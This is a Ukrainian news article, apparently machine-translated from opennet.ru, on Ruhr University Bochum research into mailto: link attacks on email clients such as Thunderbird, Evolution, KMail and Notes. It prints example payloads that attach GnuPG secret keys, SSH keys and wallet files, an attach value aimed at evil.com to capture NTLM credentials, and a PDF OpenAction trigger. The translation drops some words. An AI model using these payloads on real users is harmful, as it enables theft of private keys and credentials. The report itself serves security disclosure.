Дослідники з Рурського університету у Бохумі (Німеччина) () поведінка поштових клієнтів під час обробки посилань «mailto:» з розширеними параметрами. П'ять із двадцяти розглянутих поштових клієнтів виявилися вразливими для атаки, що маніпулює підстановкою ресурсів за допомогою параметра Attach. Ще шість поштових клієнтів були атаковані по заміні ключів PGP і S/MIME, а три клієнти виявилися вразливими для атаки з вилучення вмісту зашифрованих повідомлень.
Посилання «» застосовуються для автоматизації відкриття поштового клієнта з метою написання листа заданому на посилання адресату. Крім адреси у складі посилання, можна вказати додаткові параметри, такі як тема листа і шаблон типового вмісту. Запропонована атака маніпулює параметром «attach», що дозволяє прикріпити до вкладення, що створюється.
Поштові клієнти Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) і Pegasus Mail виявилися вразливими до тривіальної атаки, що дозволяє автоматично вказаний за посиланням виду «mailto:?attach=шлях_до_файлу». Файл прикріплюється без попередження, тому без спеціального акцентування уваги користувач може не помітити, що лист буде відправлено з прикріпленням вкладенням.
Наприклад, за допомогою посилання на вид «mailto:[захищено електронною поштою]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg» можна підставити в лист закриті ключі від GnuPG. Також можна надіслати вміст криптогаманців (~/.bitcoin/wallet.dat), SSH-ключі (~/.ssh/id_rsa) та будь-які доступні користувачеві файли. Більше того, Thunderbird дозволяє прикріплювати групи файлів маскою за допомогою конструкцій виду «attach=/tmp/*.txt».
Крім локальних файлів, деякі поштові клієнти обробляють посилання на мережеві сховища та шляхи в IMAP-сервері. Зокрема, IBM Notes дозволяє передати файл з мережевого каталогу при обробці посилань виду «attach=evil.comdummyfile», а також перехопити параметри автентифікації NTLM направивши посилання на SMB-сервер, підконтрольний атакувальному (запит буде надіслано з поточними параметрами автентифікації користувача).
Thunderbird успішно обробляє запити виду «attach=imap:///fetch>UID>/INBOX>1/», що дозволяють прикріпити вміст із папок на IMAP-сервері. При цьому листи, що витягуються з IMAP, зашифровані через OpenPGP і S/MIME, автоматично розшифровуються поштовим клієнтом перед відправкою. Розробники Thunderbird були про проблему в лютому та у випуску проблема вже усунена (гілки Thunderbird 52, 60 та 68 залишаються вразливими).
Старі версії Thunderbird виявилися вразливими і для двох інших варіантів атаки на PGP та S/MIME, запропонованих дослідниками. Зокрема, до Thunderbird, а також до OutLook, PostBox, eM Client, MailMate та R2Mail2 виявилася застосовна атака із заміни ключів, викликана тим, що поштовий клієнт автоматично імпортує та встановлює нові сертифікати, що передаються в повідомленнях S/MIME, що дозволяє атакуючому організувати заміну вже збережених у користувача відкритих ключів.
Друга атака, яку схильні Thunderbird, PostBox і MailMate, маніпулює особливостями механізму автозбереження чернеток повідомлень і дозволяє за допомогою параметрів mailto ініціювати розшифровку зашифрованих повідомлень або додавання цифрового підпису для довільних повідомлень, з подальшою передачею результату на IM. Шифротекст при цій атаці передається через парметр «body», а ініціювання звернення до IMAP-серверу атакуючого застосовується тег «meta refresh». Наприклад: ' '
Для автоматичної обробки посилань «mailto:» без участі користувача можуть застосовуватися спеціально оформлені PDF-файли — дія OpenAction у PDF дозволяє автоматично запустити обробник mailto при відкритті документа:
%PDF-1.5
1 0 об
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 об
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Джерело: opennet.ru